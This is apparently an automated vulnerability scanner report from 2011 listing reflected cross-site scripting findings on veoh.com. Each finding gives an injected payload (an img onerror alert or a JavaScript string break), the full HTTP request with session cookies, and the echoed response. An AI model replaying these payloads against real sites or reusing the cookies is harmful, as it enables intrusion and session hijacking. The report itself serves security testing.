<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 76304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 76199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 76243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=64
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=19
Content-Length: 76652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:30 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 76696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76305
